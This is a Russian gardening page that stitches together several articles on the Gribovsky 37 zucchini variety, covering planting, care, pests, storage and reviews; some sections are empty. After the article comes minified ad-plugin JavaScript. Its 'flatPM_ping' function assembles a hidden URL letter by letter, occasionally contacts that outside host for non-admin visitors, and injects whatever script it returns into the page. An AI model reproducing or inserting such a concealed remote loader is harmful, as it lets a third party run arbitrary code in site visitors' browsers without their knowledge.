9 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Кабачок грибовский 37 описание фото отзывы

Сортовые особенности кабачка Грибовский 37

Кабачок Грибовский – самый известный сорт среди любителей огородного дела. Он имеет светлый окрас и приносит большие урожаи почти во всех регионах страны. Универсальный овощ, удобен для приготовления разнообразных блюд и консервации.

Сортовые особенности кабачка Грибовский 37

Описание

Грибовский белоплодный относится к среднеранним сортам. Овощ имеет вытянутую форму и длину 20 сантиметров. Вызревает за 45 дней. Готовый плод весит около килограмма.

Кабачки белого цвета с гладкой кожурой. Взрослый плод становится зеленого цвета. Если перезревает, то желтеет. Внутри мякоть уплотненная и белоснежная. Стебли ровные, слегка ребристые. Растет кустом, листья большие пятиугольные, черешки длинные. Цветы желтые.

Урожайность достигает 5-10 кг с квадратного метра.

Сорт имеет высокую урожайность и устойчив к заболеваниям. Единственным недостатком является быстрая вызреваемость, приводящая далее к переспелости плода.

Рассада

Перед высадкой семена замачивают в специально приготовленном растворе. Его состав:

Необходимо оставить семена в этом растворе на 3 дня. Почву перед посадкой предварительно взрыхляют и опускают туда семена на 4 сантиметра.

Для получения раннего урожая рассаду помещают сначала в емкости на подоконниках, начиная с апреля. В открытую почву высаживают после 10 мая и до 10 июня. Необходимо при высадке ранней весной накрывать ее пленкой.

Выращивание в открытом грунте

Чтобы пересадить кабачок в открытый грунт, необходимо дождаться появления трех листков. Рассаду выносят на улицу этапами. Сначала на 1,5 часа, на второй и последующие дни увеличивают закаливание на два часа.

Площадь посадки для кабачка Грибовский 37 составляет 70 на 70 см. Вытаскивают из горшочков рассаду осторожно, чтобы не повредить корневую систему. Прикапывают растение, оставляя листья над землей. Местоположение в грунте должно быть освещено солнцем только первую половину дня.

Сорт переносит относительно низкую температуру в 7 °C.

Выращивание в теплице

Растения необходимо подкармливать

Почва должна иметь слабощелочную среду, лучше нейтральную. Дополнительно грунт обогащают компостом, вносят минеральные комплексы и удобрения. Подходит для этих целей суперфосфат. Нельзя добавлять в почву хлорные удобрения.

Схема ухода за растением в теплице:

  • удаление сорных культур;
  • раз в две недели подкормка;
  • полив;
  • рыхление.

Кабачковую рассаду пересаживают в теплицу через 20 дней после всхода. Оставляют промежутки между растениями до 75 см. В теплицы из-под пленки кабачки переносят с конца апреля. До этого прогревают почву печками или электроприборами.

Мульчирование

Уровень влажности влияет на урожайность культуры. Грунт накрывают пленкой, оставляя дырки для кабачков. В эти отверстия поливают растения. Иногда проводят мульчирование подсолнечным шротом и опилками. Это дает тепло овощу.

В то же время перегрев отрицательно сказывается на кабачковых. Дневная температура для нормального роста и развития – это 23 °C и ночью 17 °C. Влажность в теплице должна быть 65 %. Жара приводит к сбрасыванию завязей, а понижение температуры – к остановке роста кабачков.

Кустовые кабачки сорта Грибовский 37 поливают один раз в неделю. Если вода жесткая, то ее смягчают. Температура жидкости должна быть 20-23 °C. Проводят проветривание теплицы каждый день, чтобы происходило опыление. Свежий воздух приводит к быстрому созреванию сорта.

Для лучшего опыления насекомыми на растения наносят ватой раствор сахара. Осенью вносят навоз, золу для нормализации кислотности, немного песка и опилки. Плотная земля не подходит для посадки, поэтому ее перекапывают.

Если растение находится в теплице с мая, то пленку держат закрытой до того момента, как ростки достигнут 25 см.

Сбор и хранение урожая

Созревание плода завершается через 1 месяц. Убирают овощи, когда длина составляет 25 см. Такие плоды являются наиболее вкусными и питательными. Главное – не передержать кабачок на грядке, иначе он быстро грубеет.

Переросшие кабачки отлично подходят для дозревания и заготовки семян. Хранят Грибовский сорт при температуре от 4 до 10 °C тепла и влажности воздуха 85 %. В таких условиях он пролежит в погребах до начала весны.

На зиму сохраняют его в виде различных солений и маринадов. Хорошо лежат кабачки в замороженном виде. Вкусовые качества такого продукта не отличаются от свежего вида.

Болезни и вредители

Опрыскивание поможет справиться с вредителями

Как и любому другому овощу, этому угрожают определенные болезни и вредители.

Паутинный клещ

Заражение клещом чаще происходит в теплицах. В открытом грунте он также встречается. Насекомое цепляется под листом и плетет свои сети. Это верный признак болезни. Листья постепенно начинают засыхать, и растение может погибнуть, если не бороться с паутинным клещом.

Чтобы избавиться от заразы, перемалывают лук. На ведро воды разводят один стакан луковой смеси, добавляют 1 ложку перца, 3 ложки золы и мыльный раствор. Этим средством опрыскивают кусты. Повторяют процедуру два раза с периодичностью в шесть дней.

Бахчевая тля

Это насекомое зеленого цвета округлой формы. Длина его составляет всего 2 мм. Личинки у них с крыльями желтоватого цвета. Приходят на кабачки Грибовские с сорняков. Располагаются в нижней части листочка и на стебельках. Заражение тлей приводит к засыханию и скручиванию растения, завязи отпадают.

Чтобы бахчевая тля не поселилась на кабачках, удаляют сорняки. Производят опрыскивание карбофосом. Разводят на 10 л воды 60 г вещества. Если в парнике произошло заражение, то обливают раствором трифоса в соотношении 1 к 100.

Ростковая муха

Муха длиной до 10 мм, серого цвета с отличительной полоской на брюшке. Она откладывает личинки белого цвета. Яйца находятся в грунте и через 10 дней уничтожают семена кабачковых культур, а также молодые побеги.

Для борьбы с мухой сорняки уничтожают. В конце весны сажают семена на среднюю глубину.

Отзывы огородников

Среди многообразия сортов кабачков Грибовский 37 весьма популярен как среди огородников-любителей, так и профессионалов. По отзывам, этот вид культуры прост в ухаживании, устойчив к различным болезням и неприхотлив. За ним просто ухаживать, он отличается высокой всхожестью семян.

Этот кабачок показывает себя с приятной стороны многим садоводам. Он имеет подходящий товарный вид. Хорошо переносит транспортировку на дальние расстояния. Растение высокоурожайное.

Сорт кабачков Грибовский 37

В зависимости от сорта кабачка огородник может получить плоды разной формы, собирать ранний или поздний урожай, даже вкус мякоти может отличаться. Это связано с тем, что все сорта особенные. Кабачок Грибовский 37 также уникален, как и все остальные виды. Это среднеспелый сорт, дает стабильные урожаи ежегодно. Его особенность в стойкости к сильным похолоданиям.

Описание кабачков сорта Грибовский 37

Кабачок Грибовский 37 выведен в 1943 году и потому относится к одним из наиболее старых и проверенных временем сортов. Его выращивали на протяжении многих десятилетий во всех городах бывшего Советского Союза. Сегодня выращивается на частных участках, дачах и в промышленных масштабах, на фермах. Первые плоды собирают на 40-50 день после появления всходов.

Длина кабачка – 20-25 см, вес – 0,7-1,3 кг

Растение очень рослое, ветвистое. Плети могут сильно разрастаться. Стебель плотный, толстоватый, склонен к образованию боковых побегов. Листья зеленые, большие, слаборассеченные, пятиугольные, держатся на 30-ти сантиметровых черешках.

Плоды имеют цилиндрическую форму, вытянутые. В области плодоножки всегда присутствует слабая ребристость. Длина кабачка – 20-25 см, вес – 0,7-1,3 кг. Окрас кожуры в период созревания белый, а затем становится бледно-зеленым. Когда плод переспел, цвет кожуры может быть желтоватым. Мякоть, как правило, всегда белая.

Плоды Грибовский 37 очень вкусные, нежные, если срывать их вовремя. Мякоть сочная, с большим содержанием витаминов.

Какие достоинства и недостатки имеет сорт?

Кабачок Грибовский 37 имеет массу положительных качеств.

  • Урожайность до 500 ц/га в промышленных масштабах. На частном огороде обычно с квадратного метра собирают до 7 кг плодов.
  • Устойчив к сильным похолоданиям, возвратным заморозкам. Даже при неожиданных морозах сорт выживает и дает летом плоды.

Главный недостаток кабачков сорта Грибовский 37 – ветвистость

Главный недостаток кабачков сорта Грибовский 37 – ветвистость. На участке он занимает очень много места. Не только кустовые кабачки, но даже некоторые ветвистые намного выгодней сажать, в плане экономии места. Также стоит учитывать, что сегодня очень много новых сортов кабачков, лучших в плане урожайности, с более ранними сроками созревания, что снизило популярность вида.

Как правильно сажать кабачки?

Место посадки может быть затемненным или солнечным, но очень важно, чтобы грунт был легким, плодородным

Сажать сорт Грибовский 37 очень просто. Обычно огородники не тратят время на рассаду, семена сразу сеют в открытый грунт или теплицу примерно с середины апреля до конца мая (в зависимости от региона). На улице в период посева уже должно быть не менее +10 градусов по Цельсию днем и +5 ночью. Если еще слишком холодно или имеется угроза возвратных морозов, стоит посевы накрыть пленкой.

Важно! Если огороднику нужен ранний урожай, стоит заготавливать рассаду, а не сеять семена в открытый грунт.

Место посадки может быть затемненным или солнечным, но очень важно, чтобы грунт был легким, плодородным. Посредством разбавления торфом, речным песком, внесением перегноя его доводят до нужного вида. Кислотность должна быть не высокой, иначе кабачки просто не вырастут.

Между рядами делают промежуток в 1 метр

Так как кабачок сорта Грибовский 37 ветвистый, стоит сажать его подальше друг от друга. Обычно делаются лунки в шахматном порядке. Расстояние между ямками должно быть примерно 50-80 см. Между рядами делают промежуток в 1 метр. Сначала ямки поливают, ждут, когда вода впитается. После этого в каждую лунку сеют по 2-3 семени, на случай если не прорастут, хотя всхожесть у сорта хорошая. Затем лунки присыпают землей на 3-4 см.

Важно! Во время посевов используется только теплая вода!

Как ухаживать за сортом?

Уход за кабачками Грибовский 37 очень простой, однако вообще забывать о том, что на огороде растет культура нельзя. Им нужна забота, просто не в той мере, как например, томатам.

    Поливы проводят очень редко, обычно, если долго длится засуха. В нормальные (не очень жаркие) летние дни будет достаточно 1-2 поливов в неделю. Но стоит следить, чтобы земля не сильно пересыхала, ведь количество нужной воды зависит также и от типа почвы.

Чтобы растение не заполонило весь участок, его рост нужно контролировать

Сбор урожая кабачков Грибовский 37

Созревают кабачки Грибовский 37 в среднем за 1,5 месяца. Проверить готовность урожая очень просто – если плод достиг 20 см в длину, его можно убирать. Именно такие размеры кабачков у этого сорта наиболее приемлемые. Подобные плоды относятся к молодым, не перезревшим, наиболее пригодным в пищу.

Важно! Перезревшие кабачки могут быть слишком вытянутыми, толстенькими. У них огрубевает кожура, мякоть становится невкусной. Поэтому собирать этот овощ необходимо вовремя!

Если нужно отложить кабачок на семена, стоит оставить его на грядке подольше. Пусть переспевает, зато семена смогут дозреть.

Грибовский 37 – универсальный сорт. Из него можно много вкусных блюд

Срок хранения кабачков Грибовский 37 длится до конца февраля, но лишь при условии, что их вовремя собрали и создали для них наиболее подходящие условия. Лежит этот вид очень хорошо при температуре +4…+10 градусов и влажности 85-90% в погребе.

Интересно! После длительного хранения кабачок может взяться твердой коркой, разрезать его проще всего после вымачивания на протяжении нескольких часов в простой воде.

Грибовский 37 – универсальный сорт. Из него можно делать вкусные первые, вторые блюда, закуски, салаты, икру. Он идеально подходит для консервирования на зиму (салаты, ассорти, икра). Как и любой иной тип кабачков, этот можно порезать кружочками, брусочками или кубиками и просто заморозить, чтобы зимой бросать в блюда. При таком хранении вкус плодов не меняется.

ВИДЕО — Секреты по выращиванию кабачков

Кабачок Грибовский 37 — описание сорта и правила выращивания

Кабачок Грибовский 37 — подробное описание сорта растения, правила ухода и посадки за ним, особенности выращивания, фото и видео.

Кабачок Грибовский 37 является достаточно востребованным в России белоплодным сортотипам и полностью созревает приблизительно за 45 дней после того, как проклюнутся всходы.

Этот сорт средней спелости отлично показал себя при домашнем произрастании и росте на грядке на приусадебном участке.

Кабачок Грибовский 37 -описание сорта

Основное достоинство этого кабачка — высочайшие показатели нетребовательности к условиям выращивания, а также стойкость к различным распространенным болезням.

Кабачки этого среднераннего вида можно использовать для приготовления консервации, имеют приятный вкус, а также обладают высочайшими товарными свойствами.

Описание овощной культуры следующее:

  1. Кабачки беловато-зелёные, длиной 180-200 мм, в форме цилиндра, с гладкой кожей.
  2. Внутренность белая, среднеплотная.
  3. Вес хорошего плода примерно 0,75-1,35 кг.

Растительная культура относится к кустовым, хорошо ветвится.

Сорт обладает высокой урожайностью.

Если выращивать по правилам и проводить качественный уход, то урожайность будет более 8 кило с 1 квадрата.

Как вырастить рассаду?

Кабачковое растение любит тепло и свет, поэтому, если хочется получить урожай пораньше, многие дачники применяют рассадную технологию выращивания.

Обычно, высеивание посадочного материала для получения высококачественной и сильной рассады выполняется приблизительно за 30 дней до предполагаемой даты посадки на участок.

Описание растительной культуры и его характеристики сорта предполагают применение горшков:

  • из торфа;
  • объёмом не меньше 100 мл;
  • в высоту 80-100 мм.

Семена лучше приобрести в специализированном магазине.

При приготовлении рассады необходимо придерживаться таких советов:

  1. Землю необходимо брать обогащенную, рыхлую, отличным решением будет купить смесь почвы в цветочном магазине.
  2. Высаживать предварительно замоченный посадочный материал для рассады следует на глубину 40-50 мм.
  3. Когда пройдет семь дней после того, как проклюнутся саженцы, необходимо внести удобрения на основе половины ложки суперфосфата и столько же мочевины, которые предварительно разводятся в 1 л тёплой воды. Можно подкармливать очень результативным препаратом «Бутон». Затем обязательно кормят спустя полторы недели после первого подкармливания с использованием средства нитрофоски с обязательным включением в состав древесной золы.
  4. Для поливания применяется вода, температурный режим которой 21-23 C из расчёта 0.1 л на каждый куст. Поливание проводится не чаще 2-х раз за 7 суток, что сокращает риск гнили корней.

Высококачественная рассада здоровая и имеет не меньше 3-х настоящих листков.

Прежде чем высаживать рассаду на огород, необходимо выполнить закаливание.

Углублять рассаду в ямки для посадки нужно до семядольных листиков.

Стандартная схема высаживания рассады овощной культуры составляет 700×700 мм.

Кабачок Грибовский 37 — уход и выращивание

Ухаживать за кабачками несложно.

Уход предусматривает своевременное поливание, уборку сорной травы, подкармливание и прорыхление почвы, а также выполнение защитного обрабатывания кустов:

  1. Первый раз прорыхлить следует спустя 7 дней после посадки саженцев на постоянное место.
  2. Когда саженцам будет примерно 30 дней, необходимо внести удобрения, с расходом на каждые 10 кустов раствор из 40 гр. суперфосфата, 20 гр. аммиачной селитры и 20 гр. калийных солей, на 10 литров воды. Чтобы подкормить второй раз применяют состав органики в виде птичьего помёта, разбавленного в воде 1:15, или коровяка, сделанного в пропорции 1:10.
  3. Чтобы привлечь на кабачок насекомых, которые будут проводить опыление рассады, важно систематически опрыскивать сиропом из сахара.
  4. Поливать следует вечером, литраж применяемой жидкости зависит от типа грунта, погоды и стадии развития растительной культуры.

Важно запомнить, что для продолжительной сохранности кабачков поливание необходимо прекратить приблизительно за 7 дней до сбора плодов с огородного участка.

Кабачок Грибовский 37 — Отзывы садоводов

Отзывы огородников о данном сорте в основном положительные, кабачок Грибовский очень стойкий к следующим заболеваниям:

Все это дает возможность сократить число обработок с использованием сильных химикатов и способствует получению наиболее экологичных плодов.

Растительная культура также характеризуется стойкостью к низким температурам.

Довольно твёрдая кожура создает превосходную транспортабельность овощей, что делает сортовую разновидность актуальной для выращивания с целью продажи и потребления в пищу.

Популярный овощ очень питательный и выращивать его достаточно просто. Отличный продукт для приготовления различных блюд и для консервации.

С выращиванием кабачков может справиться даже новичок. Урожай даже при погрешностях ухода будет хорошим.

Кабачок Грибовский 37: фото, описание, отзывы, характеристика сорта, достоинства и недостатки, особенности выращивания

Описание сорта

Характеристика плодов

Далее представлены фото кабачков сорта Грибовский 37:






Достоинства и недостатки

У этого сорта кабачков есть свои достоинства, среди которых можно выделить основные:

Применение

Особенности выращивания

Посмотрите видео! Cорт кабачков Грибовский 37

Отзывы, кто сажал

Ниже приведены отзывы тех, кто сажал кабачок Грибовский 37. Прочитав их, вы поймете все достоинства сорта и секреты его выращивания.

Валентина, г.Саранск

Ольга, Подмосковье

Елена, г.Нижний Новгород

Анна, г.Москва

Татьяна, г.Пермь

Владимир, г.Ростов

Пантелей, г.Тверь

Назарий, г.Уфа

Если статья была полезна, поставь 5 звездочек!

(Пока оценок нет)

Кабачок «Грибовский 37»: описание сорта с фото, как выращивать

К одному из самых предпочитаемых для выращивания сортов, у которых светлый плод, можно отнести кабачок «Грибовский 37». Овощ прекрасно растет во многих районах страны, да и урожайность кабачков высока. Он весьма неприхотлив в уходе и стойко сражается с большим количеством болезней. У кабачков такого сорта всегда есть товарный вид, вкусовые качества великолепны и подходят они и для приготовления блюд, и для консервации.

Особенности и характеристика сорта

Кабачки «Грибовские» являются представителями семейства Тыквенных и их можно отнести к одному из видов обыкновенной тыквы. Это травянистое растение. Растет как плетистый и кустовой куст, сильно ветвится. В России его выращивают как однолетнюю культуру.

Такой сорт называют среднеранним, длительность вегетационного периода составляет от сорока пяти до шестидесяти дней. Готовый плод может весить до 1,3 килограмма. Очень вкусный. Такие кабачки практически не болеют. Был создан селекционерами специально для средней полосы России.

Стебелек у кабачков крупный, может красиво стелиться по земле, листья большого размера, пятилопастные, цветы ярко-желтые цвета, похожи на колокольчики. Это растение имеет как женские, так и мужские цветочки. Кабачок, как правило, немного удлинен или овальной формы, окрашен в цвета от беловатого до зеленоватого, бывает украшен полосками или пятнышками.

Выращиваем кабачки грибовские 37 в открытом грунте

Для выращивания плодов на свежем воздухе на обычной грядке надо перекопать почву еще осенью. Весной, перед посадкой, необходимо внести компоненты для того, чтобы почва стала плодородной и рыхлой. Подойдут песок, торф или перегной. А в ямки необходимо добавлять горсточку золы либо перегноя. На одном квадратном метре должно «жить» всего три сеянца. Если приходится высевать семена в южных регионах, то любая из лунок оказывается «домиком» для трех семечек, а позже оставляют наиболее крепкий саженец.

Какова же у этого овоща характеристика? Кабачок «Грибовский 37» (фото, описание этого сорта помогают начинающим огородникам разобраться — будут ли они выращивать такую культуру) довольно теплолюбивый, прекрасно переносит периоды засухи, ему комфортно, когда много света и хорошей почвы. Если огородник будет соблюдать все озвученные условия, урожай будет высокий.

Подготовка к пересадке и последующий уход

Для начала следует заранее осуществить подготовку посадочного материала. Делать это, таким образом, пакетик семян замочить в чайной ложечке стимулятора роста на двенадцать часов; затем семена переложить в мешочек из обычной материи, который заранее был намочен в воде, и держать трое суток; потом семена вынуть и высеять в открытый грунт или использовать индивидуальные стаканчики, предназначенные для рассады.

Особенности выращивания в теплице

В теплицу кабачки сорт «Грибовский 37» высаживают для получения раннего урожая. Сначала хорошо подкармливается почва удобрениями. Кабачки следует высадить в шахматном порядке — на расстоянии один от другого 50 см, между рядочками — 70 см. Теплицу надо проветривать. Лучшей температурой для кабачков является 26 градусов. Как только на улице устанавливаются очень жаркие погодные условия, специалисты рекомендуют теплицу открывать.

Поливать следует под корешок от одного литра на одно высаженное растение до двух. Увлажнять необходимо не очень часто, но щедро.

Сбор урожая

Особенные условия такого сорта заключаются в том, что кабачки способны в скором времени перерастать. Поэтому их необходимо собирать каждые восемь-двенадцать дней, потому что именно в этот период у кабачков светлая нежная кожица.

Надо упомянуть и о том, что плоды кабачков созревают через 50-60 дней после того, как семена были высажены. Ранние плоды следует собирать один раз в семь дней и отрезать их вместе с плодоножкой.

Как хранить урожай

Если огородник правильно выполнил посадку и уход, то вскоре он сможет собрать хороший урожай. Хранение кабачков будет зависеть от того, успели ли плоды созреть полностью. А определяется это по кожуре — кабачки с плотной кожурой будут храниться очень долго.

Для наилучшего хранения овощей следует заранее под каждый созревающий кабачок подложить кусочек фанеры, чтобы плод не касался земли. Чтобы сохранить урожай и зимой, убрать его следует до наступления заморозков. Перед тем как отправить кабачки в погреб на хранение, их необходимо просушить на солнце и протереть тканью. В соломе плоды можно хранить, если температура не превышает 5 градусов выше ноля.

Можно сохранить также кабачки и в морозильной камере, предварительно сняв с них кожуру и порезав на небольшие кусочки. Но здесь есть существенный минус: не у всех есть огромные морозильные камеры, да и по вкусовым качествам замороженные кабачки уступают свежим.

Что наносит вред и «заставляет» болеть кабачки Грибовские-37?

Навредить этому сорту способны насекомые, которые «забредают» на огороды. Так, они могут паразитировать на различных культурах. Вследствие этого необходимо моментально принимать радикальные меры, как только огородник их заметил.

Паутинный клещ — он способен нанести вред большому количеству культур. «Живет» внизу листа, оплетая его паутиной и высасывая из него клеточный сок. Сначала на листочках появляются маленькие точки, которые увеличиваются. Лист засыхает. Урон может быть нанесен весьма серьезный.

Ростковая муха появляется очень рано весной, она делает кладку под коркой земли. Маленькие личинки повредят всходы кабачков, прогрызая в стеблях дырки. Росточки увянут и погибнут.

Кабачки этого сорта вполне устойчивы к болезням. И все же болезни бахчевых могут их поразить. Например, мучнистая роса. Она хорошо развивается, когда погода сыровата либо выпадает роса. Заболевают листочки и стебли, на них появляются пятна белого цвета. При возникновении такого заболевания плоды созревают раньше необходимого. Они получатся безвкусными и часто недозрелыми.

Чем вызвана горечь кабачка?

Горьковатый вкус кабачков вызван увеличением количества кукурбитацина. Он находится в мякоти плодов, но если его там немного, то ощутить его невозможно. А увеличивается содержание этого вещества из-за нарушения возделывания овощей либо неблагоприятной погоды для развития кабачков.

Единственным вариантом не выращивать кабачок с горькостью, стараться, чтобы культура не получила стресс, и чтобы в ее тканях не накапливался кукурбитацин в избытке.

Одним из способов удалить горький привкус — очистить и порезать кабачки, присыпать их солью и оставить на пару часиков. Сок, который выделился, смыть. С этим соком уберется и горьковатый привкус.

Отзывы и советы огородников

Именно кабачок «Грибовский» является одним из наиболее удобных в выращивании среди остальных сортов. Бывалые огородники советуют не применять обработку культуры химикатами. Поскольку эти кабачки прекрасно переносят низкие температуры, их можно выращивать для хранения и транспортировки. Даже начинающие садоводы могут вырастить этот сорт, так как он неприхотлив и не требует кропотливого ухода.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};